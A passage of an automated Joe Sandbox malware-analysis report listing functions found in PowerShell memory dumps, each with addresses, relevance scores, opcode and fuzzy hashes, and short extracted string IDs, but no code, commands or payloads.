                                              • Source File: 00000000.00000002.1377036494.00007FFAAC870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaac870000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7f95f8eb89a18cad746d5ecfe9b17ac28340f38fae3a89f3642ef078b492583c
                                              • Instruction ID: 3e868654e2c131823b30963c9de07619282ab11ff6dc072cdcd97aabb000ddba
                                              • Opcode Fuzzy Hash: 7f95f8eb89a18cad746d5ecfe9b17ac28340f38fae3a89f3642ef078b492583c
                                              • Instruction Fuzzy Hash: 68310453E1FAAB8BF7A5A32C18651B866C0FF4A620B5840FAD44DC31D3EE08BC4842C1
                                              Function 00007FFAAC871117 Relevance: .1, Instructions: 118COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1377036494.00007FFAAC870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC870000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaac870000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2995a640234555e31c8c2d2689fd5b230d4f5dfe7e0668b536e7d3d69fb82aa6
                                              • Instruction ID: d9ee429ff7dfd733d330b8fa6da85f4c95f9bab67a1965290dc4acc620c2434f
                                              • Opcode Fuzzy Hash: 2995a640234555e31c8c2d2689fd5b230d4f5dfe7e0668b536e7d3d69fb82aa6
                                              • Instruction Fuzzy Hash: 80313962E2FA968FF798976858621B866D0FF46220B5850FED00DC78D3FD08F84883D1
                                              Function 00007FFAAC7A4575 Relevance: .0, Instructions: 49COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1376746425.00007FFAAC7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaac7a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 94b56fdebe38f4091b5f4d14db650b3dc458cea6429c722bb5174eba508e340c
                                              • Instruction ID: df298b11c6002b5f50d552c13ac0ddf3e8eda12b0b5900dd3d877637321f6da6
                                              • Opcode Fuzzy Hash: 94b56fdebe38f4091b5f4d14db650b3dc458cea6429c722bb5174eba508e340c
                                              • Instruction Fuzzy Hash: 0D01677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056EE58AC3661DA36E881CB45

                                              Non-executed Functions

                                              Function 00007FFAAC7A208D Relevance: 3.2, Strings: 2, Instructions: 734COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1376746425.00007FFAAC7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaac7a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @rl$HIL
                                              • API String ID: 0-340021331
                                              • Opcode ID: fbd89ac1cf3a9962650f5efec4283e329ef7f9b92315ffae58d255a4e29bedf7
                                              • Instruction ID: 8df4463dc0abe05c9f096612d885a7f75b1e57f87e45b212bdba321028b37e50
                                              • Opcode Fuzzy Hash: fbd89ac1cf3a9962650f5efec4283e329ef7f9b92315ffae58d255a4e29bedf7
                                              • Instruction Fuzzy Hash: 75229EA7A0E7C39FF312476858661E53FB0EF9366570940F7D5CC8A093A9199C0E87E1
                                              Function 00007FFAAC7A044D Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1376746425.00007FFAAC7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_7ffaac7a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (08$8,8$p08$/8
                                              • API String ID: 0-2069709940
                                              • Opcode ID: add9aaa76e714ecc36b0c218da2100e4e1a2c4b4e5ef932b673079fb50c361de
                                              • Instruction ID: 1eceb6bd142fe4d5ced2aed3546e8ce2a74490ff72e1a14fa42fa36107441b60
                                              • Opcode Fuzzy Hash: add9aaa76e714ecc36b0c218da2100e4e1a2c4b4e5ef932b673079fb50c361de
                                              • Instruction Fuzzy Hash: 8B317CC380F7C18FF3565BA818250796FB0AF13A5071988FBE0DD8A597A8099D0DC392

                                              Executed Functions

                                              Function 00007FFAAC7B33B5 Relevance: .0, Instructions: 49COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.1460971154.00007FFAAC7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_7ffaac7b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 958aad0e130f1e4d9af8a1b01f3ec3eb990464f2f9c36909badeddca125a589f
                                              • Instruction ID: cd5c2ce2d90117dbec657884365d6bd7c382809fd946e0ba2de0d615365ad37c
                                              • Opcode Fuzzy Hash: 958aad0e130f1e4d9af8a1b01f3ec3eb990464f2f9c36909badeddca125a589f
                                              • Instruction Fuzzy Hash: 7701677111CB0C8FD744EF0CE451AA6B7E0FB95364F50056DE58AC3661DA36E882CB45

                                              Non-executed Functions

                                              Function 00007FFAAC7B0735 Relevance: 7.7, Strings: 6, Instructions: 154COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.1460971154.00007FFAAC7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_7ffaac7b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (08$8,8$H18$P/8$-8$/8
                                              • API String ID: 0-3186795746
                                              • Opcode ID: 10b31a281c79b6bfc48f6bb0fbc34c7c7cf12888fd92da4aee5fbc63e4ad89e5
                                              • Instruction ID: 75bafa05c7cf52757b197b1df5ed2fbc382568b7522ea2ec13e44e85a3b6a871
                                              • Opcode Fuzzy Hash: 10b31a281c79b6bfc48f6bb0fbc34c7c7cf12888fd92da4aee5fbc63e4ad89e5
                                              • Instruction Fuzzy Hash: F7515AD690F7C28FF7265BA81855175AFA0EF13640B08C0FAE0CD4A5EB9859DA0DC7C6
                                              Function 00007FFAAC7B07C0 Relevance: 7.6, Strings: 6, Instructions: 121COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.1460971154.00007FFAAC7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_12_2_7ffaac7b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (08$8,8$H18$P/8$-8$/8
                                              • API String ID: 0-3186795746
                                              • Opcode ID: 51f981548dc439ae46c4b2f03782b76605189650bd044ffb8a994ae067efafb5
                                              • Instruction ID: 1ce50fa069aeb7701edcc03e661452ec3e54726acb606c40b563048ce38f2486
                                              • Opcode Fuzzy Hash: 51f981548dc439ae46c4b2f03782b76605189650bd044ffb8a994ae067efafb5
                                              • Instruction Fuzzy Hash: 35415AD690FBC14FF3564BA41855175AFA0EF53640B18C0BAE0CD4B5EB9859DA0DC3C5